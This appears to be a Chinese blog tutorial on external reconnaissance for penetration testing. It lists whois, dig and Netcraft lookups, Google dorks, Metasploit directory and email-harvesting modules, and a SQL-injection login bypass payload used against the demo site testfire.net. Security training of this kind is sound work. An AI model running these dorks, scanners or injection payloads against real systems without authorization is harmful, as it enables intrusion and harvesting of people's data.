外围信息搜集
2017-12-23 08:42
211 查看
whois域名注册信息查询
nslookup域名查询
dig域名查询
DNS服务器可通过whois得到
dig比nslookup得到的结果更权威
IP2Location地理位置查询
http://ip.chinaz.com
国内ip地址查询:http://www.cz88.net
netcraft查询详细信息
查询www.baidu.com的详细信息
Google Hacking
GHDB搜索字符串
网络目录结构
特定类型的文件
易存在sql注入的页面
检测sql注入
可以看到对输入没有过滤,重新输入
成功登入后台
Metasploit搜索网站目录
Metasploit搜索网站中的email地址
路由侦察
参考
《Metasploit渗透魔鬼训练营》
whois testfire.net
nslookup域名查询
nslookup set type=A // 注意type后面不能有空格,对IP地址解析 testfire.net exit
set type=MX //查找邮件转发服务器
dig域名查询
dig @<DNS服务器> <待查询的域名>
DNS服务器可通过whois得到
dig比nslookup得到的结果更权威
dig @dns.baidu.com baidu.com
IP2Location地理位置查询
http://ip.chinaz.com
国内ip地址查询:http://www.cz88.net
netcraft查询详细信息
查询www.baidu.com的详细信息
http://toolbar.netcraft.com/site_report?url=http://www.baidu.com
Google Hacking
GHDB搜索字符串
exploit-db.com/exploits/google-dorks
网络目录结构
parent directory site testfire.net
特定类型的文件
学生信息 filetype:xls site:firetest.net filetype:xls
易存在sql注入的页面
site:testfire.net inurl:login
检测sql注入
name: test' password: test'
可以看到对输入没有过滤,重新输入
name: admin 'or' 1 password: test 'or' 1
成功登入后台
Metasploit搜索网站目录
service postgresql start msfsconsole search brute_dirs use auxiliary/scanner/http/dir_scanner show options set threads 50 set rhosts www.testfire.net exploit
Metasploit搜索网站中的email地址
use auxiliary/gather/search_email_collector set domain altoromutual.com run
路由侦察
traceroute www.baidu.com
参考
《Metasploit渗透魔鬼训练营》
相关文章推荐
- metasploit 情报搜集技术【1】外围信息搜索
- 信息搜集之外围信息搜集
- kali信息搜集工具之copy-router-config
- 20145325张梓靖 《网络对抗技术》 信息搜集与漏洞扫描
- 20145223 杨梦云 《网络对抗》 信息搜集与漏洞扫描
- 20145232韩文浩《网络对抗》信息搜集与漏洞扫描
- 20145337《网络对抗技术》信息搜集与漏洞扫描
- 20145317彭垚《网络对抗》Exp6 信息搜集与漏洞扫描
- 20145220韩旭飞《网络对抗》Exp6 信息搜集与漏洞扫描
- 互联网高手教你如何搜集你想要的信息
- Web安全渗透信息搜集相关技术
- Oracle 搜集统计信息的存储过程
- 渗透的本质是信息搜集(第一季)
- [转]高效工作的信息搜集及管理术
- 11g 关于自动搜集统计信息
- kali信息搜集工具之DMitry
- (信息搜集)通过DNS和IP地址挖掘目标网络信息:whois
- 20145229吴姗珊《网络攻防》信息搜集与漏洞
- 20145331魏澍琛《网络对抗》Exp6 信息搜集与漏洞扫描